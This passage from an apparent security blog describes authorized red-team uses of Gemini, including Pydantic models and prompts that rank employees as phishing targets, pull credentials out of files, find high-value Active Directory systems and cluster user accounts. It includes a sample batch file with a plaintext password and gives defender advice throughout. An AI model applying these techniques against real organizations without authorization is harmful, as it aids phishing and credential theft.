data and get structured data. Thus, the first problem we have to solve is to get the LLM to output the data in a format we can specify. The simple method is to ask the LLM to output the data in a machine readable format like JSON, XML, or CSV. However, you will quickly notice that you have to be quite specific with the data format, and the LLM can easily output data in another format, ignoring your instructions.</span></p> <p><span style="vertical-align: baseline;">Luckily for us, other people have encountered this problem and have solved it with something called Guardrails. One of the projects we have found is called </span><a href="https://github.com/guardrails-ai/guardrails" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">guardrails-ai</span></a><span style="vertical-align: baseline;">. It is a Python library that allows you to create guardrails—specific requirements—for a model based on Pydantic.</span></p> <p><span style="vertical-align: baseline;">To illustrate, take a simple Python class from the documentation to validate a pet from the output of the LLM:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>from pydantic import BaseModel, Field class Pet(BaseModel): pet_type: str = Field(description="Species of pet") name: str = Field(description="a unique pet name")</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">You can use the next code from the Guardrails documentation to process the output of the LLM into a structured object:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>from guardrails import Guard import openai prompt = """ What kind of pet should I get and what should I name it? ${gr.complete_json_suffix_v2} """ guard = Guard.from_pydantic(output_class=Pet, prompt=prompt) raw_output, validated_output, *rest = guard( llm_api=openai.completions.create, engine="gpt-3.5-turbo-instruct" ) print(validated_output)</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">If we look at what this library generates underwater for this prompt, we see that it adds a structured object part with the instructions for the LLM to output data in a specific way. This streamlines the way you can get structured data from an LLM.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ai-adversarial-emulation-fig1.max-1000x1000.png" alt="The generated prompt from the Pydantic model"> </a> <figcaption class="article-image__caption "><p data-block-key="cz2wg">Figure 1: The generated prompt from the Pydantic model</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">For the next use case, we will show the Pydantic models we've created to process the output.</span></p> <h2><span style="vertical-align: baseline;">Red Team Use Cases</span></h2> <p><span style="vertical-align: baseline;">The next sections contain some use cases where we can use an LLM to get structured data out of data obtained. The use cases are divided into three categories of the attack lifecycle: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Initial Reconnaissance</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Escalate Privileges</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Internal Reconnaissance</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ai-adversarial-emulation-fig2.max-1000x1000.png" alt="Attack lifecycle"> </a> <figcaption class="article-image__caption "><p data-block-key="5hgue">Figure 2: Attack lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Initial Reconnaissance</span></h2> <p><span style="vertical-align: baseline;">Open Source Intelligence (OSINT) is an important part of red teaming. It includes gathering data about the target organization from news articles, social media, and corporate reports.</span></p> <p><span style="vertical-align: baseline;">This information can then be used in other red team phases such as during phishing. For defenders, it helps them understand which parts of their organization are exposed to the internet, anticipating a possible future attack. In the next use case, we talk about processing social media information to process roles and extract useful information.</span></p> <h3><span style="vertical-align: baseline;">Use Case 1: Social Media Job Functions Information</span></h3> <p><span style="vertical-align: baseline;">During OSINT, we often try to get information from employees about their function in their company. This helps with performing phishing attacks, as we do not want to target IT professionals, especially those that work in cybersecurity.</span></p> <p><span style="vertical-align: baseline;">Social media sites allow their users to write about their job titles in a free format. This means that the information is unstructured and can be written in any language and any format.</span></p> <p><span style="vertical-align: baseline;">We can try to extract the information from the title with simple matches; however, because the users can fill in anything and in any language, this problem can be better solved with an LLM.</span></p> <h4><span style="vertical-align: baseline;">Data Model</span></h4> <p><span style="vertical-align: baseline;">First, we create a Pydantic model for the Guardrail:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-markup"><code>class RoleOutput(BaseModel): role: str = Field(description="Role being analyzed") it: bool = Field(description="The role is related to IT") cybersecurity: bool = Field(description="The role is related to CyberSecurity") experience_level: str = Field( description="Experience level of the role.", )</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This model has two Boolean options if the role is IT or cybersecurity related. Additionally, we would like to know the experience level of the role.</span></p> <h4><span style="vertical-align: baseline;">Prompt</span></h4> <p><span style="vertical-align: baseline;">Next, let's create a prompt to instruct the LLM to extract the requested information from the role. This prompt is quite simple and just asks the LLM to fill in the data.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the following role, answer the following questions. If the answer doesn't exist in the role, enter ``. ${role} ${gr.complete_xml_suffix_v2}</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The two last lines are placeholders used by guardrails-ai.</span></p> <h4><span style="vertical-align: baseline;">Results</span></h4> <p><span style="vertical-align: baseline;">To test the models, we have scraped the titles that employees use on social media. This dataset contained the titles that the employees used and contained 235 entries.</span><span style="vertical-align: baseline;"> For testing, we used the gemini-1.0-pro model.</span></p> <p><span style="vertical-align: baseline;"><a href="https://deepmind.google/technologies/gemini/" rel="noopener" target="_blank">Gemini</a> managed to parse 232 entries. The results are shown in Table 1.</span></p></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong><span style="vertical-align: baseline;">Not IT</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong><span style="vertical-align: baseline;">IT</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong><span style="vertical-align: baseline;">Cybersecurity</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Gemini</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">183</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">49</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">5</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Manual evaluation <br/></span><span style="vertical-align: baseline;">by a red team operator</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">185</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">47</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">5</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">False positive</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">1</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">3</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">0</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 1: Results of Gemini parsing 232 job title entries</span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In the end, Gemini processed the roles quite on par with a human. Most of the false positives were questionable because it is not very clear if the role was actually IT related. The experience level did not perform well, as the model deemed the experience level as "unknown" or "none" for most of the entries. To resolve this issue, the field was changed so that the experience level should be a number from 1 to 10. After running the analysis again, this yielded better results for the experience level. The lowest experience levels (1–4) contained function titles like "intern," "specialist," or "assistant." This usually indicated that the person had been employed at that role for a shorter period of time. The updated data model is shown as follows:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>class RoleOutput(BaseModel): role: str = Field(description="Role being analyzed") it: bool = Field(description="The role is related to IT") cybersecurity: bool = Field(description="The role is related to CyberSecurity") experience_level: int = Field( description="Estimate of the experience level of the role on a scale of 1-10. Where 1 is low experience and 10 is high.", )</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This approach helped us to sort through a large dataset of phishing targets by identifying employees that did not have IT and cybersecurity roles, and sorting them by experience level. This can speed up target selection for large organizations and may allow us to better emulate attackers by changing the prompts or selection criteria. To defend against this, data analysis is more difficult. In theory, you can instruct all your employees to include "Cybersecurity" in their role, but that does not scale well or solve the underlying phishing problem. The best approach with regards to phishing is, in our experience, to invest into phishing resistant multifactor authentication (MFA) and application allowlisting. If applied well, these solutions can mitigate phishing attacks as an initial access vector.</span></p> <h2><span style="vertical-align: baseline;">Escalate Privileges</span></h2> <p><span style="vertical-align: baseline;">Once attackers establish a foothold into an organization, one of their first acts is often to improve their level of access or control through privilege escalation. There are quite a few methods that can be used for this. It comes in a local system-based variety as well as wider domain-wide types, with some based on exploits or misconfigurations, and others based on finding sensitive information when searching through files.</span></p> <p><span style="vertical-align: baseline;">Our focus will be on the final aspect, which aligns with our challenge of identifying the desired information within the vast amount of data, like finding a needle in a haystack.</span></p> <h3><span style="vertical-align: baseline;">Use Case 2: Credentials in Files</span></h3> <p><span style="vertical-align: baseline;">After gaining initial access to the target network, one of the more common enumeration methods employed by attackers is to perform share enumeration and try to locate interesting files. There are quite a few tools that can do this, such as </span><a href="https://github.com/SnaffCon/Snaffler" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Snaffler</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">After you identify files that potentially contain credentials, you can go through them manually to find useful ones. However, if you do this in a large organization, there is a chance that you will have hundreds to thousands of hits. In that case, there are some tools that can help with finding and classifying credentials like </span><a href="https://github.com/trufflesecurity/trufflehog" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">TruffleHog</span></a><span style="vertical-align: baseline;"> and </span><a href="https://github.com/praetorian-inc/noseyparker" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Nosey Parker</span></a><span style="vertical-align: baseline;">. Additionally, the Python library </span><a href="https://github.com/Yelp/detect-secrets" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">detect-secrets</span></a><span style="vertical-align: baseline;"> can help with this task. </span></p> <p><span style="vertical-align: baseline;">Most of these tools look for common patterns or file types that they understand. To cover unknown file types or credentials in emails or other formats, it might instead be valuable to use an LLM to analyze the files to find any unknown or unrecognized formats.</span></p> <p><span style="vertical-align: baseline;">Technically, we can just run all tools and use a linear regression model to combine the results into one. </span><span style="vertical-align: baseline;">An anonymized example of a file with a password that we encountered during our tests is shown as follows:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>@Echo Off Net Use /Del * /Yes Set /p Path=&lt;"path.txt" Net Use %Path% Welcome01@ /User:CHAOS.LOCAL\WorkstationAdmin If Not Exist "C:\Data" MKDIR "C:\Data" Copy %Path%\. C:\Data Timeout 02</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Data Model</span></h4> <p><span style="vertical-align: baseline;">We used the following Python classes to instruct Gemini to retrieve credentials with an optional domain. One file can contain multiple credentials, so we use a list of credentials to instruct Gemini to optionally retrieve multiple credentials from one file.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>class Credential(BaseModel): password: str = Field(description="Potential password of an account") username: str = Field(description="Potential username of an account") domain: Optional[str] = Field( description="Optional domain of an account", default="" ) class ListOfCredentials(BaseModel): credentials: list[Credential] = []</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Prompt</span></h4> <p><span style="vertical-align: baseline;">In the prompt, we give some examples of what kind of systems we are looking for, and output into JSON once again:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the following file, check if there are credentials in the file. Only include results if there is at least one username and password. If the domain doesn't exist in the file, enter `` as a default value. ${file} ${gr.complete_xml_suffix_v2}</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Results</span></h4> <p><span style="vertical-align: baseline;">We tested on 600 files, where 304 contain credentials and 296 do not. Testing occurred with the gemini-1.5 model. Each file took about five seconds to process.</span></p> <p><span style="vertical-align: baseline;">To compare results with other tools, we also tested Nosey Parker and TruffleHog. Both NoseyParker and Truffle Hog are made to find credentials in a structured way in files, including repositories. Their use case is usually for known file formats and randomly structured files.</span></p> <p><span style="vertical-align: baseline;">The results are summarized in Table 2.</span></p></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Tool</span></strong></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">True Negative</span></strong></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">False Positive</span></strong></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">False Negative</span></strong></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">True Positive</span></strong></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Nosey Parker</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">284 (47%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">12 (2%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">136 (23%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">168 (28%)</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TruffleHog</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">294 (49%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">2 (&lt;1%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">180 (30%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">124 (21%)</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Gemini</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">278 (46%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">18 (3%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">23 (4%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">281 (47%)</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: Results of testing for credentials in files, where 304 contain them and 296 do not</span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In this context, the definitions of true negative, false positive, false negative, and true positive are as follows:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">True Negative</strong><span style="vertical-align: baseline;">: A file does not contain any credentials, and the tool correctly indicates that there are no credentials.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">False Positive</strong><span style="vertical-align: baseline;">: The tool incorrectly indicates that a file contains credentials when it does not.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">False Negative</strong><span style="vertical-align: baseline;">: The tool incorrectly indicates that a file does not contain any credentials when it does.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">True Positive</strong><span style="vertical-align: baseline;">: The tool correctly indicates that a file contains credentials.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">In conclusion, Gemini finds the most files with credentials, at a cost of a slightly higher false positive rate. TruffleHog has the lowest false positive rate, but also finds the least amount of true positives. This is to be expected, as a higher true positive rate usually is accompanied by a higher false positive rate. The current dataset has almost an equal number of files with and without credentials—in real-world scenarios this ratio can differ wildly, which means that the false positive rate is still important even though the percentages are quite close.</span></p> <p><span style="vertical-align: baseline;">To optimize this approach, you can use all three tools, combine the output signals to a single signal, and then sort the potential files based on this combined signal.</span></p> <p><span style="vertical-align: baseline;">Defenders can, and should, use the same techniques previously described to enumerate the internal file shares and remove or limit access to files that contain credentials. Make sure to check what file shares each server and workstation exposes to the network, because in some cases file shares are exposed accidentally or were forgotten about.</span></p> <h2><span style="vertical-align: baseline;">Internal Reconnaissance</span></h2> <p><span style="vertical-align: baseline;">When attackers have gained a better position in the network, the next step in their playbooks is understanding the domain in which they have landed so they can construct a path to their ultimate goal. This could be full domain control or access to specific systems or users, depending on the threat actor's mission. From a red team perspective, we need to be able to emulate this. From a defender's perspective, we need to find these paths before the attackers exploit them.</span></p> <p><span style="vertical-align: baseline;">The main tool that red teamers use to analyze Active Directory is </span><a href="https://github.com/BloodHoundAD/BloodHound" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">BloodHound</span></a><span style="vertical-align: baseline;">, which uses a graph database to find paths in the Active Directory. BloodHound is executed in two steps. First, an ingester retrieves the data from the target Active Directory. Second, this data is ingested and analyzed by BloodHound to find attack paths.</span></p> <p><span style="vertical-align: baseline;">Some tools that can gather data to be used in BloodHound are:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Sharphound</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Bloodhound.py</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Rusthound</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Adexplorer</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Bofhound</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Soaphound</span></p> </li> </ul> <p><span style="vertical-align: baseline;">These tools gather data from the Active Directory and other systems and output it in a format that BloodHound can read. In theory, if we have all the information about the network in the graph, then we can just query the graph to figure out how to achieve our objective.</span></p> <p><span style="vertical-align: baseline;">To improve the data in BloodHound, we have thought of additional use cases. Use Case 3 is about finding high-value systems. Discovering more hidden edges in BloodHound is part of Use Case 4 and Use Case 5.</span></p> <h3><span style="vertical-align: baseline;">Use Case 3: High-Value Target Detection in Active Directory</span></h3> <p><span style="vertical-align: baseline;">By default, BloodHound deems some groups and computers as high value. One of the main activities in internal reconnaissance is figuring out which systems in the client's network are high-value targets. Some examples of systems that we are interested in, and that can lead to domain compromise, are:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Backup systems</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SCCM</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Certificate services</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Exchange</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">WSUS systems</span></p> </li> </ul> <p><span style="vertical-align: baseline;">There are many ways to indicate which servers are used for a certain function, and it depends on how the IT administrators have configured it in their domain. There are some fields that may contain data in various forms to indicate what the system is used for. This is a prime example of unstructured data that might be analyzable with an LLM.</span></p> <p><span style="vertical-align: baseline;">The following fields in the Active Directory might contain the relevant information:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Name</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Samaccountname</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Description</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Distinguishedname</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SPNs</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Data Model</span></h4> <p><span style="vertical-align: baseline;">In the end, we would like to have a list of names of the systems the LLM has deemed high value. During development, we noticed that LLM results improved dramatically if you asked it to specify a reason. Thus, our Pydantic model looks like this:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>class HighValueSystem(BaseModel): name: str = Field(description="Name of this system") reason: str = Field(description="Reason why this system is high value", default="") class HighValueResults(BaseModel): systems: list[HighValueSystem] = Field(description="high value systems", default=[])</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Prompt</span></h4> <p><span style="vertical-align: baseline;">In the prompt, we give some examples of what kind of systems we are looking for:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the data, identify which systems are high value targets, look for: sccm servers, jump systems, certificate systems, backup systems and other valuable systems. Use the first (name) field to identify the systems.</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Results</span></h4> <p><span style="vertical-align: baseline;">We tested this prompt on a dataset of 400 systems and executed it five times. All systems were sent in one query to the model. To accommodate this, we used the gemini-1.5 model because it has a huge context window. Here are some examples of reasons Gemini provided, and what we think the reason was based off:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Domain controller</strong><span style="vertical-align: baseline;">: Looks like this was based on the "OU=Domain Controllers" distinguishedname field of BloodHound</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Jumpbox</strong><span style="vertical-align: baseline;">: Based on the "OU=Jumpboxes,OU=Bastion Servers" distinguishedname</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Lansweeper</strong><span style="vertical-align: baseline;">: Based on the description field of the computer</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Backup Server</strong><span style="vertical-align: baseline;">: Based on "OU=Backup Servers" distinguishedname</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Some of the high-value targets are valid yet already known, like domain controllers. Others are good finds, like the jumpbox and backup servers. This method can process system names in other languages and more verbose descriptions of systems to determine systems that may be high value. Additionally, this method can be adapted to allow for a more specific query—for example, that might suit a different client environment:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the data, identify which systems are related to SWIFT. Use the first (name) field to identify the systems.</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In this case, the LLM will look for SWIFT servers and may save you some time searching for it manually. This approach can potentially be even better when you combine this data with internal documentation to give you results, even if the Active Directory information is lacking any information about the usage of the system.</span></p> <p><span style="vertical-align: baseline;">For defenders, there are some ways to deal with this situation:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Limit the amount of information in the Active Directory and put the system descriptions in your documentation instead of within the Active Directory</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Limit the amount of information a regular user can retrieve from the Active Directory</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor LDAP queries to see if a large amount of data is being retrieved from LDAP</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Use Case 4: User Clustering</span></h3> <p><span style="vertical-align: baseline;">After gaining an initial strong position, and understanding the systems in the network, attackers will often need to find the right users to compromise to gain further privileges in the domain. For defenders, legacy user accounts or administrators with too many rights is a common security issue.</span></p> <p><span style="vertical-align: baseline;">Administrators often have multiple user accounts: one for normal operations like reading email and using it on their workstations, and one or multiple administrator accounts. This separation is done to make it harder for attackers to compromise the administrator account.</span></p> <p><span style="vertical-align: baseline;">There are some common flaws in the implementations that sometimes make it possible to bypass these separations. Most of the methods require the attacker to cluster the users together to see which accounts belong to the same employee. In many cases, this can be done by inspecting the Active Directory objects and searching for patterns in the display name, description, or other fields. To automate this, we tried to find these patterns with Gemini.</span></p> <h4><span style="vertical-align: baseline;">Data Model</span></h4> <p><span style="vertical-align: baseline;">For this use case, we would like to have the account's names that Gemini clusters together. During initial testing, the results were quite random. However, after adding a "reason" field, the results improved dramatically. So we used the next Pydantic model:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>class User(BaseModel): accounts: list[Account] = Field( description="accounts that probably belongs to this user", default=[] ) reason: str = Field( description="Reason why these accounts belong to this user", default="" ) class UserAccountResults(BaseModel): users: list[User] = Field(description="users with multiple accounts", default=[])</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Prompt</span></h4> <p><span style="vertical-align: baseline;">In the prompt, we give some examples of what kind of systems we are looking for:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the data, cluster the accounts that belong to a single person by checking for similarities in the 